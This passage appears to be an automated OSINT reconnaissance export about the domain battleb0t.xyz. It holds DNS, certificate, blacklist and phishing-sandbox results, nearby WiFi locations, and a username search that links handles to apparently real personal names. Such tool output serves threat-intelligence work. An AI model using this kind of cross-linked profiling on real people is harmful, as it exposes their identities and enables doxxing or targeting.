u'threat_level': 0, u'type': 8, u'description': u'"5f774173a2f6f8720a80d3d7_decor-dots_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6305c4d0e96629fb1faee847_mob_app%20store_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6305c4d096183ee5c61f2081_mob_google%20play_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff60f8b3be007f3ef5780f3_Cover%20AML%20risk%20screening_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8ffce80d3d6_decor-rows_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff5c5146d1b1ad22260e36b_seamless-integration_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c611b6f7021b7a90b6_nav-healthcare_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b5847afb666a7db5b8_nav-kyb_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n 
"5ff61e3603c269bbe2a4fd83_Powerfull-transactions_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2ac6d2755267bbee952_nav-anti-money-laundering_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d399b50c403dd6ef8a71_icon_solutions_1_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c51ee3b2917a9fc9d3_nav-financial-services_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c73 | 185.199.109.153 |
| 2023-05-12 02:44:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cdn-185-199-108-153.github.com | 185.199.108.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 7622 0155 (Net ID: 00:00:C5:F9:20:A8) | 32.8608, -79.9746 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Duolingo (Category: hobby)<br>https://www.duolingo.com/profile/Altpapier | Altpapier |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ^D^M^L^W^]^C^A^U^M^Y^E^L^_^R^G (Net ID: 00:05:5D:D9:90:56) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.125 | 35.229.48.116 |
| 2023-05-12 02:48:29 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://habby-bit.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://habby-bit.github.io/NetflixClone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cc8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_cc8_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_cc8_IESQMMUTEX_0_331"\n "IsoScope_cc8_ConnHashTable<3272>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_cc8_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3272"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3272"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': 
None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "185.199.110.153:443"\n "104.18.23.52:443"\n "172.64.101.10:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"habby-bit.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"habby-bit.github.io"\n "ka-f.fontawesome.com"\n "kit.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<p class="text-dark">Watch right on Netflix.com</p>" (Indicator: "netflix.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', 
u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free-fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "free-fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF4963DA67E64EB8AA.TMP" has type "data"- Location: [%TEMP%\\~DF4963DA67E64EB8AA.TMP]- [targetUID: 00000000-00003272]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003272]\n "~DFF31E5E821B61D096.TMP" has type "data"- Location: [%TEMP%\\~DFF31E5E821B61D096.TMP]- [targetUID: 00000000-00003272]\n "~DF42C5F4D22EAE6326.TMP" has type "data"- Location: [%TEMP%\\~DF42C5F4D22EAE6326.TMP]- [targetUID: 00000000-00003272]\n "~DF20A640065AD00792.TMP" has type "data"- Location: [%TEMP%\\~DF20A640065AD00792.TMP]- [targetUID: 00000000-00003272]\n "~DF17599AD0A6701A34.TMP" has type "data"- Location: 
[%TEMP%\\~DF17599AD0A6701A34.TMP]- [targetUID: 00000000-00003272]\n "NetflixClone_2_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /NetflixClone/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://habby-bit.github.io/NetflixClone/"\n Pattern match: "http://habby-bit.github.io"\n Pattern match: "SUIDMmicrosoft.com/921636467187231027693355855405031027575*MUID0C1B981BC3486B7C30C18AEDC2046A44microsoft.com/102549716108831106047355902280031027575*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA694"\n Pattern match: "MUIDB0C1B981BC3486B7C30C18AEDC2046A44ieonline.microsoft.com/921649716108831106047355933530031027575*"\n Pattern match: "https://kit.fontawesome.com/098a7050d2.js"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: 
"SUIDMmicrosoft.com/921636467187231027693355855405031027575*MUID0C1B981BC3486B7C30C18AEDC2046A44microsoft.com/102549716108831106047355902280031027575*_EDGE_V1microsoft.com/921649716108831106047355949155031027575*SRCHDAF=NOFORMmicrosoft.com/10243323789440310"\n Pattern match: "MUID19FA43693F9268132655519F3E166994msn.com/102550716108831106047397246030031027575*"\n Pattern match: "SUIDMmicrosoft.com/921636467187231027693355855405031027575*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=2022013"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025140058060831063802397136655031027575*"\n Pattern match: "www.msn.com/"\n Heuristic match: "habby-bit.github.io"\n Heuristic match: "ka-f.fontawesome.com"\n Heuristic match: "kit.fontawesome.com"\n Pattern match: "https://habby-bit.github.io/NetflixClone/Accept-Language"\n Heuristic match: "GET /NetflixClone/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: habby-bit.github.io"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Heuristic match: "abby-bit.github.io"\n Pattern match: "habby-bit.github.io/NetflixClone/"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwl"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=70599"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145837"\n Pattern match: 
"http://go.microsoft.com/fwlink/?LinkID=57190"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145765"\n Heuristic match: "Example: computer.fabrikam.com"\n Pattern match: "vista.gallery.microsoft.com/vista/SideShow.aspx"\n Pattern match: "http://www.icra.org/vocabulary/"\n Pattern match: "wmploc.dll/Offline_Buy.htm\'res://wmploc.dll/Offline_MediaGuide.htm*res://wmploc.dll/Offline_Subscriptions.htm"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=32146res://wmploc.dll/ICW_ErrorPage.htm"\n Pattern match: "wmploc.dll/Service_Initial.htm"\n Pattern match: "wmploc | 185.199.110.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zoom (Net ID: 00:01:38:85:BD:08) | 37.7642, -122.3993 |
| 2023-05-12 02:44:07 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | GitHub Pages | battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Chess.com (Category: gaming) https://www.chess.com/member/login | login |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | Ashburn, Virginia, 20149, United States, North America |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | linksys (Net ID: 00:14:BF:93:D4:35) | 40.2024, 29.0398 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:f9:3b:c0:6f:f8:ab:e7:35:d5:ff:95:55:28:
87:2c:f3:42:5c:6a:f2:dc:b2:0f:7b:b2:97:bc:68:
c2:d8:25:b1:da:3c:de:c9:ee:4a:54:a6:08:c9:a0:
d5:34:39:c8:96:b7:d1:e3:5d:f3:2b:db:f7:37:5d:
57:65:f7:3d:16:c9:ad:d6:e6:bb:bc:97:c6:1c:bc:
c7:1d:a0:c9:cc:3a:d4:e1:69:37:d2:58:c2:fe:42:
4e:90:a6:4c:72:5e:0f:c5:0a:f9:18:b1:c7:54:af:
b4:03:13:bc:ce:85:b6:0d:a5:99:fc:98:b2:37:24:
39:66:7b:f1:78:3b:4b:9e:51:be:75:ad:a6:19:8d:
be:a9:ca:f2:df:b7:73:9f:c6:14:09:e1:46:c4:93:
a4:45:7c:eb:1e:47:42:88:d1:8d:e7:29:c0:07:7b:
ad:57:d3:0b:cf:a1:a1:bc:65:12:20:8e:92:81:50:
55:40:69:4e:0d:62:29:ab:00:e6:81:6e:83:3a:16:
09:da:2a:57:32:b1:5d:79:74:f0:1d:02:e0:52:6d:
d5:85:2d:cb:f6:ef:5e:8f:03:a0:14:64:19:bb:71:
65:85:3e:bc:4e:e8:75:85:4b:a0:7d:df:3f:2a:67:
46:82:ea:56:e3:e5:01:c8:49:e2:f1:a3:b1:04:af:
98:45:24:1b:7e:2d:57:39:72:ff:5a:94:89:31:42:
ae:19:e5:2d:eb:c8:08:fc:be:37:02:5d:04:1a:b3:
f0:62:42:14:91:38:7a:96:77:5e:53:eb:f1:d9:8e:
45:46:0d:65:07:6b:18:0a:65:96:3c:4e:b9:77:05:
52:b4:4d:17:73:72:d9:49:c8:16:75:9c:84:35:12:
73:86:4f:08:27:5d:f3:e9:85:10:9a:ff:e4:3a:63:
ef:83:9f:03:76:a4:3f:ac:72:d5:f4:bb:3a:60:bc:
21:1c:e8:7c:52:79:bd:fe:19:9a:69:78:22:a6:5d:
64:8d:04:55:f3:ec:4d:6c:47:45:2c:6c:9e:cc:14:
be:67:76:25:be:fd:51:60:a1:2e:10:af:1b:46:0c:
e9:ec:3a:3c:0b:c9:2a:97:61:1c:a8:6a:9d:53:cd:
2d:6c:4e:66:f4:08:01:29:89:61:ff:d2:73:d2:a1:
da:94:32:dc:5c:78:ad:19:fa:b3:fb:26:0f:35:c2:
87:17:c9:ae:6f:c7:ce:81:d6:7d:27:95:3b:49:39:
e6:cf:30:85:95:79:a1:35:71:86:5b:66:f7:9d:ae:
96:d5:9a:1d:e3:e0:76:fe:b7:a0:b5:1a:16:0b:1b:
5e:d4:d9:5b:b6:4a:4d:33:65:03:80:b9:ab:69:35:
1b:42:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:52:05.336 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:57:F9:C2:75:97:36:8B:12:D4:C1:E7:CA:
50:E7:70:49:3E:19:7B:CF:6E:2E:B2:32:0A:7B:AB:5D:
31:9F:A6:29:02:21:00:A5:FD:E1:03:A8:C4:49:20:AF:
46:1D:1E:50:E3:8E:07:43:7A:DC:16:22:84:DD:F5:8B:
28:06:E9:91:CB:AE:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 13 13:52:05.327 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:EA:4C:FF:35:E1:97:F0:36:1E:40:22:
0D:44:8D:BA:C6:F1:8F:73:35:1F:B7:67:97:EA:2B:1B:
FC:27:7F:33:02:21:00:81:59:F8:29:60:75:D8:8F:00:
60:06:8E:9A:65:C6:5E:93:57:7E:5C:BF:B5:78:29:4F:
6F:C1:3B:97:29:1D:C7
Signature Algorithm: sha256WithRSAEncryption
24:d6:1b:d8:e4:8b:66:d1:df:e9:e2:97:93:78:a9:26:b8:6c:
f8:3c:98:90:50:e1:55:d7:91:ae:77:21:2c:40:df:85:16:56:
67:98:1c:b9:14:ca:43:24:bf:39:32:06:c7:fe:42:03:fa:45:
3b:3f:39:c5:26:88:13:e9:3d:1d:bc:bd:a1:0a:08:74:1a:3b:
e6:07:80:5b:f5:9a:21:ed:4a:45:40:ac:8a:6d:c1:de:40:12:
47:d5:33:88:6e:06:c5:32:a1:76:01:b1:50:fb:53:29:92:fa:
e1:03:af:88:12:00:9a:38:a5:9d:32:3e:46:8b:7c:f6:27:29:
ec:fa:85:68:fa:91:a6:95:c5:d7:a0:da:33:eb:03:cf:9c:a6:
c0:5c:0d:e8:d8:f8:03:5d:fb:9f:61:df:e1:a0:63:74:01:18:
4c:0d:17:f3:db:74:32:3c:fc:3b:44:24:e7:10:2b:f7:69:d2:
89:35:6f:e7:d7:11:5a:13:0a:a9:83:9e:0f:c2:f2:ea:d8:50:
30:65:9c:16:49:f6:30:d8:a2:e3:83:ff:5d:ff:00:a2:ff:57:
de:68:f4:70:90:a3:db:c8:9c:55:ce:ea:f6:4c:08:6a:01:70:
91:f9:f8:91:9d:f2:99:1f:be:06:10:87:53:07:83:04:df:62:
62:3f:1f:52
| battleb0t.xyz |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 172.67.135.9 | ayhu.xyz |
| 2023-05-12 02:44:14 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | pics.battleb0t.xyz |
| 2023-05-12 02:44:16 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | oldfluid.battleb0t.xyz |
| 2023-05-12 03:03:19 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:10:b4:30:a3:e0:72:2f:ec:4e:bc:95:e3:12:bb:83:8d:6f
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Dec 14 04:12:32 2022 GMT
Not After : Mar 14 04:12:31 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:31:e0:5d:42:f2:be:35:60:b1:bf:3c:dd:6a:3a:
e9:66:ce:65:b9:42:55:e5:1f:5b:0f:4a:7d:d2:dd:
d5:d5:2a:c8:4c:26:cc:d6:24:4c:c6:8a:d7:5d:8d:
ad:45:7b:81:26:49:fc:64:c6:a9:da:25:d4:46:11:
f7:82:81:c2:c2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:9F:0E:73:7B:4F:1D:9B:10:7F:DE:3A:BF:95:29:99:72:64:39:CE
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 14 05:12:32.135 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:59:29:35:BE:AB:71:65:F9:96:06:4F:
5B:59:CE:57:24:54:B9:12:04:B5:DF:8A:07:E6:76:0F:
20:03:70:03:02:21:00:B7:78:F0:A2:3F:27:E7:3B:21:
C5:33:D6:55:11:C6:40:C1:C5:5B:26:28:AF:CA:56:1E:
26:52:58:CD:58:16:E5
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 05:12:32.070 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:15:09:02:D4:FF:29:7B:0F:E9:E1:19:A4:
68:CC:B6:9A:5B:B7:91:A8:77:5F:34:7E:C8:58:7A:5D:
F7:C7:09:DA:02:20:1E:EF:33:8E:F5:7A:6D:A5:37:EA:
0D:F2:52:F7:31:2F:0F:C3:A2:0E:FC:59:37:68:C1:0E:
F3:7B:09:D9:73:6E
Signature Algorithm: ecdsa-with-SHA384
30:65:02:31:00:c4:f1:3e:03:59:6c:36:cb:84:da:12:51:f5:
76:a2:e4:bc:23:64:76:f4:b2:f0:4c:8f:9b:8b:90:fb:12:ce:
7b:42:97:0a:3a:61:32:82:0b:b0:21:2a:25:06:6a:5f:a9:02:
30:75:43:e3:50:ce:c6:89:24:bf:1b:e6:c4:50:fc:7d:e6:4e:
0c:28:05:6d:f7:e2:b6:59:55:90:02:80:b6:cc:fc:7e:93:a5:
f6:0f:4b:2a:01:37:a1:29:5b:b6:a5:1d:89
|
| 2023-05-12 03:09:28 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 87.248.157.102:443 | 87.248.157.102 |
| 2023-05-12 03:09:46 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 67.170.74.34.bc.googleusercontent.com | 34.74.170.67 |
| 2023-05-12 03:00:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.15): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.124): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:54 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.83): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SK_WiFi20D4 (Net ID: 00:01:36:9F:20:D5) | 34.0544, -118.244 |
| 2023-05-12 03:00:58 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 3 | 0 | None | VXVault Malicious URL List [cdn-185-199-111-153.github.com] http://vxvault.net/URL_List.php | cdn-185-199-111-153.github.com |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 101 (Net ID: 00:01:03:7C:1B:D2) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:07 | Co-Hosted Site | No | CertSpotter | 1 | 0 | 1 | 0 | None | sni.cloudflaressl.com | battleb0t.xyz |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-ye.github.io] https://www.openphish.com/feed.txt | 0-ye.github.io |
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 15 | 0 | 0 | 0 | None | Battleb0t | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:54:07 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-11T22:54:40.561Z", "ip": "2606:4700:3031::ac43:8709", "location_updated_at": "2023-05-06T00:44:41.372312Z", "autonomous_system_updated_at": "2023-05-07T11:38:36.576170Z", "location": {"province": "Illinois", "city": "Rosemont", "country": "United States", "coordinates": {"latitude": 41.99531, "longitude": -87.88451}, "postal_code": "60018", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}, "dns": {"records": {"faculdade.kennedy.br": {"record_type": "AAAA", "resolved_at": "2023-05-05T12:38:49.993145868Z"}, "resultscaraccidentlawyers.info": {"record_type": "AAAA", "resolved_at": "2023-04-24T17:51:50.273083754Z"}, "mail.atlas-media.net": {"record_type": "AAAA", "resolved_at": "2023-05-11T18:53:21.824413141Z"}, "dasecotibi.ml": {"record_type": "AAAA", "resolved_at": "2023-04-20T22:04:20.422633323Z"}, "unbeatableteams.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T16:19:06.771575554Z"}, "ronnebytorget.se": {"record_type": "AAAA", "resolved_at": "2023-04-13T20:13:15.262547330Z"}, "www.cg.cncap.ca": {"record_type": "AAAA", "resolved_at": "2023-04-21T12:55:12.348140033Z"}, "nakedvampire.com": {"record_type": "AAAA", "resolved_at": "2023-04-06T15:40:27.395207080Z"}, "homesayofficial.com": {"record_type": "AAAA", "resolved_at": "2023-05-08T14:59:56.576817191Z"}, "cdn-3.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-01T00:33:24.889964115Z"}, "www.detroitabortioncenter.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T14:18:13.771625214Z"}, "olypay.com": {"record_type": "AAAA", "resolved_at": "2023-04-13T00:46:10.231275663Z"}, "4wdinfo.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T13:06:50.126601945Z"}, "www.plus-fm.es": {"record_type": "CNAME", "resolved_at": "2023-05-09T17:04:29.567246924Z"}, "cdn-2.madeincanadadirectory.ca.cdn.cloudflare.net": 
